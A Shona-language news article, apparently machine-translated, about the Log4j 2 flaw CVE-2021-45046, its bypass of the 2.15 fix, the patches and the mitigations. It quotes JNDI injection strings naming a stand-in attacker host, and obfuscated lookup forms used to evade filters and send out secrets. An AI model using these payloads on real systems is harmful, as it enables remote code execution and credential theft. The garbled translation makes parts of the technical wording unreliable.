Vakaona imwe njodzi Log4j 2 inobvumira kodhi yakaipa kuti iitwe

log4j

Nhau yakaburitswa munguva pfupi yapfuura kuti yaive yakaratidza imwe njodzi muJNDI yekutarisa kuita muLog4j 2 raibhurari (CVE-2021-45046), iyo inoitika pasinei nekugadzirisa kwakawedzerwa muvhezheni 2.15 uye zvisinei nekushandiswa kwe "log4j2.noFormatMsgLookup" gadziriro yekudzivirira.

Dambudziko ine ngozi zvakanyanya kunyanya kune ekare mavhezheni eLog4j 2, yakachengetedzwa nemureza we "noFormatMsgLookup", sezvo ichikutendera kuti upfuure dziviriro kubva panjodzi yapfuura (Log4Shell, CVE-2021-44228), iyo inokutendera kuti umhanye kodhi yako paseva.

For the vhezheni 2.15 vashandisi, iko kushanda kunogumira pakugadzira mamiriro nekuda kwekugumiswa kusiri kwemaitiro kwechikumbiro nekuda kwekuneta kwezviwanikwa zviripo.

Kunetseka zvinongokanganisa masisitimu anoshandisa tsvaga mamiriro, akadai se $ {ctx: loginId}, kana Thread Context Mepu (MDC) matemplate, akadai se% X,% mdc, uye% MDC, yekunyoresa.

Iko kushanda kunowira pakugadzira mamiriro ekutumira data rine JNDI substitutions kune registry kana uchishandisa mamiriro emubvunzo kana matemplate eMDC muchikumbiro, ayo anosarudza mitemo yekufometa zvakabuda kune registry.

ari Vatsvakurudzi veLunaSec vakacherechedza kupfuura yeLog4j shanduro dzakaderera pane 2.15, kusagadzikana uku kunogona kushandiswa sevheta nyowani yeLog4Shell kurwisa, inotungamira kukuita kwekodhi kana ThreadContext mataurirwo achishandiswa pakutumira kune registry, iyo inosanganisira data yekunze, zvisinei nekuti mureza wakagadzirirwa kuchengetedzwa. "NoMsgFormatLookups" kana "% m {nolookups}" template.

Nzira yekudzivirira inoderedzwa kusvika pakuti pachinzvimbo chekutsiviwa kwakananga "$ {jndi: ldap: //example.com/a}", chirevo ichi chinotsiviwa neukoshi hwepakati pepakati inoshandiswa mumitemo kufomati tarisa. rejista.

Semuenzaniso, kana mamiriro akakumbira $ {ctx: apiversion} inoshandiswa pakutumirwa kune registry, kurwiswa kunogona kuitwa nekutsiva data "$ {jndi: ldap: //attacker.com/a}" muukoshi. yakanyorwa kune deviation variable.

Mushanduro Log4j 2.15, kusazvibata kunogona kushandiswa kuita DoS kurwisa kana uchipfuura kukosha kuThreadContext, iyo inokwenenzverwa kuburikidza nekubuda kwefomati pateni kugadzirisa.

Kukwanisa kuedza kugadzirisa matambudziko akasangana nawo zvigadziriso 2.16 uye 2.12.2 zvakaburitswa kuvhara kusagadzikana. Mubazi reLog4j 2.16, mukuwedzera kune zvigadziriso zvakaitwa muvhezheni 2.15 uye kusungirirwa kweJNDI LDAP zvikumbiro kune "localhost", nekusarudzika basa reJNDI rakadzimwa zvachose uye rutsigiro rwekutsiviwa kwemeseji kwabviswa.

Sekugadzirisa, zvinokurudzirwa kubvisa kirasi yeJndiLookup kubva mukirasi (somuenzaniso, "zip -q -d log4j-core - *. Jar org /apache/logging/log4j/core/lookup/JndiLookup.class").

Kana ari zviito zvinotorwa nemapurojekiti akasiyana:

Para NginxKubva pane njs module, chinyorwa chakagadzirirwa chinovhara kutapurirana kweJNDI mazwi muHTTP misoro, URIs uye muviri wePOST zvikumbiro. Iyo script inogona kushandiswa pane epamberi maseva kuchengetedza kumashure.
YeHAProxy, mitemo yekumisikidza inopihwa kudzivirira kushanda kweCVE-2021-44228.

Pamusoro pekurwiswa kwakambozivikanwa kwakanangana nekuumbwa kwe botnet yekuchera cryptocurrency, pakashandiswa kusazvibata muLog4J 2 kuparadzira hutsinye ransomware encrypting zviri mukati me disks uye inoda rudzikinuro kuti inyore.

Checkpoint yakaratidza kumativi makumi matanhatu akasiyana marudzi akasiyana-siyana ekushandisa anoshandiswa pakurwisa.

CloudFlare yakashuma kuti kuedza kuyedza kuratidzwa kwekusagadzikana muLog4j vakaonekwa muna Zvita 1, ndiko kuti, mazuva masere pamberi pekuburitswa pachena kwedambudziko. Kuedza kwekutanga kushandisa kusazvibata kwakanyorwa maminetsi e8 chete mushure mekunge ruzivo rwaburitswa. CloudFlare report inotaurawo nezve kushandiswa kwezvitsivo se "$ {env: FOO: -j} ndi: $ {lower: L} inopa $ {pasi: P}" kusiya mask "jndi: ldap" uye kushandiswa kwe $ {env} mazwi ekurwisa kuendesa ruzivo nezve passwords uye makiyi ekuwana akachengetwa munzvimbo dzakasiyana kune yekunze server, uye $ {sys} mazwi ekuunganidza ruzivo nezve system.

Finalmente kana iwe uchifarira kuziva zvakawanda nezvazvo unogona kutarisa inotevera chinongedzo.


Izvo zviri muchinyorwa zvinoomerera pamisimboti yedu ye tsika dzekunyora. Kuti utaure chikanganiso tinya pano.

Iva wekutanga kutaura

Siya yako yekutaura

Your kero e havazobvumirwi ichibudiswa.

*

*

  1. Inotarisira data: AB Internet Networks 2008 SL
  2. Chinangwa cheiyo data: Kudzora SPAM, manejimendi manejimendi.
  3. Legitimation: Kubvuma kwako
  4. Kutaurirana kwedata
  5. Dhata yekuchengetedza: Dhatabhesi inobatwa neOccentus Networks (EU)
  6. Kodzero: Panguva ipi neipi iwe unogona kudzora, kupora uye kudzima ruzivo rwako